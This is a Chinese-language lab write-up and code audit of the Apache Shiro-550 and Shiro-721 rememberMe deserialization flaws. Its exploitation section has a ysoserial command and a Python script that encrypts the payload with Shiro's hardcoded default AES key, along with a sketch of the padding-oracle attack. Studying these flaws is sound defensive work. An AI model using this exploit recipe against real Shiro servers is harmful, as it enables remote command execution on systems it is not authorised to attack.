漏洞介绍

Shiro-550

shiro框架在登录页面有rememberMe的功能，这个功能的实现是将标识用户身份的对象Principals通过序列化、加密、base64编码之后放到cookie，方便下次访问的时候再通过反序列化辨别用户身份。而因为加密使用了硬编码的秘钥，导致攻击者可以构造恶意的对象进行序列化后加密、编码然后传到后台触发反序列化从而执行任意命令。

Shiro-721

同样的功能，由于shiro加密采用AES-128-CBC模式进行加密，同时解密的IV值是可控的。在这些前提下，就可以同Padding Oracle Attack方式攻击爆破出解密的中间值，然后利用IV可控的机制，在不知道秘钥的情况下控制服务端解密出任意的明文。由此，任然可以构造恶意对象达到反序列化执行任意命令的目标。

原作者分析

注：Shiro-550和Shiro-721是apache的问题编号，详情参考

环境信息

windows-10、tomcat-9.0.53、shiro-1.2.4、IDEA 2021 社区版

源码下载

https://github.com/apache/shiro.git，选择1.2.4版本下载

idea中设置tomcat运行环境

1. 官网下载 tomcat-9.0.53，解压到任意目录下，添加环境变量(目录替换成自己的)

   TOMCAT_HOME：D:\Program Files\apache-tomcat-9.0.53

   CATALINA_HOME：D:\Program Files\apache-tomcat-9.0.53

   PATH：D:\Program Files\apache-tomcat-9.0.53\bin;D:\Program Files\apache-tomcat-9.0.53\lib

2. IDEA安装Smart Tomcat插件，并设置 tomcat 服务器

   

   

添加Tomcat Server并运行sample/web项目

修改pom文件中，jstl版本为1.2

run–>edit configuration

访问Apache Shiro Quickstart，和上面配置中的端口和路径对应

代码审计

在登录的时候点记住密码会加密生成键为rememberme的cookie，下面跟踪加密的代码流程

1. 断点下在 RememberMeManager#onSuccessfulLogin

   

2. 进到 RememberMe 的分支

   

3. 继续跟进到AbstractRememberMeManager#rememberIdentity函数，可以看到AbstractRememberMeManager#convertPrincipalsToBytes 生成序列化字节，跟进去之后就可以看到对序列化字节加密的地方

   

4. 跟进到加密函数中，先是得加密算法实例，可以看到是AES CBC模式。然后跟进看下传进去的秘钥

   

5. 这边秘钥的最终来源需要手动去跟踪，可以发现通过 set 方法将 DEFAULT_CIPHER_KEY_BYTES 传了过去，然后 DEFAULT_CIPHER_KEY_BYTES 就是硬编码在代码中

   

6. 秘钥硬编码跟完了，继续回到分析加密的过程

   

7. 可以发现这边传入一个 iv 值，这样就存在一个问题：key是硬编码的，但 iv 值是随机的，这样怎么构造加密后的 payload? 继续跟进加密函数中看下

   重点看下这边通过 arraycopy 将 iv 值和密文拼接在一起了

   

8. 跟进完加密算法，回到AbstractRememberMeManager#rememberIdentity函数，跟进到CookieRememberMeManager#rememberSerializedIdentity函数，可以看到对加密后的数据进行base64编码

   

   最后总结一下流程就是：序列化——加密——base64编码

分析解密流程

1. 断点下在org.apache.shiro.mgt.DefaultSecurityManager#getRememberedIdentity，然后对页面发起带 cookie 的请求抓包，删除 cookie 中 JSESSIONID（这样才能触发rememberMe的反序列化流程）

   

2. 跟进getRememberedPrincipals函数，先获取到 rememberMe 字段的值，然后进行了反序列化操作，分别跟进一下

   

3. 先跟进getRememberedSerializedIdentity函数，这个函数就是获取了 cookie 中 rememberMe字段的值，并进行了base64解码

   

4. 再跟进org.apache.shiro.mgt.AbstractRememberMeManager#convertBytesToPrincipals，主要就是解密，然后调用反序列化函数生成对象

   

5. 反序列化就是正常操作，主要看下解密的过程，最后跟进到org.apache.shiro.crypto.JcaCipherService#decrypt(byte[], byte[])

   

   重点就在于这边解答了上面的疑问，可以看到先从传进来的密文中取出了 iv 值，然后再对真正的密文进行解密。也就是说 iv 值参与加密也不影响，都是用户可控的！

   总结一下解密流程就是：base64解码——AES 解密——反序列化

漏洞利用

1. 明白了整个流程，就可以直接人为构造一个 rememberMe 序列化字符串了。

   利用ysoserial-master生成序列化的POC

   java -jar ysoserial-master.jar CommonsCollections2 calc > 1.txt
   

   python实现加密和编码：

   import base64
   from Cryptodome.Cipher import AES# 这是密钥
   key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==") # key
   iv =  b"1"*16
   # 从文件读取序列化字符串
   with open('1.txt', 'rb') as f:text = f.read()BS = AES.block_size
   # 创建加密实例
   cipher = AES.new(key, AES.MODE_CBC, iv)
   # 填充
   x = BS - (len(text) % BS)
   text = text + chr(x).encode() * xencrypto_text = cipher.encrypt(text)
   # 把IV值拼接在前面
   encrypto_text = iv + encrypto_text
   result = base64.b64encode(encrypto_text)
   print(result)
   

   用生成的加密字符串放到cookie中访问shiro站点就可以触发

   

2. shrio反序列化检测和利用工具 ShiroExploit-Deprecated

   Shiro-550：

   

   

   Shiro-721:

   通过工具利用padding oracle方法进行爆破，生成任意对象。

   

为什么需要登录才能利用

这边根据试验猜测是因为shiro不会因为padding不正确而返回500错误，所以没有办法根据状态判断填充是否正确，也就没法生成任意数据。

输入任意值cookie，返回依旧是200

Shiro-721破解过程和原理

1. 通过wireshark将工具爆破的包抓下来，将里面cookie捞出来和正常cookie对比一下，发现正好是在原数据后加了16字节数据块的base64编码（是编码之后加到原来的编码数据后，不是加之后再进行编码，这样不影响原有数据的编码）。

2. 另外就是，在原数据后面增加任意数据不会影响原数据的反序列化。因为序列化二进制数据前部分数据是对类和属性的描述，后部分数据是值。所以根据前面的描述就能确定数据的结尾在哪，后面添加的脏数据也不会影响反序列化的结果。java序列化数据格式

   工具最终跑出来的cookie如下，就是在原有的cookie的基础上加上爆破出来的数据。

   

3. 所以，原理就是每次在原有的cookie上爆破一个块，根据登录状态来进行判断填充是否正确，构造任意数据。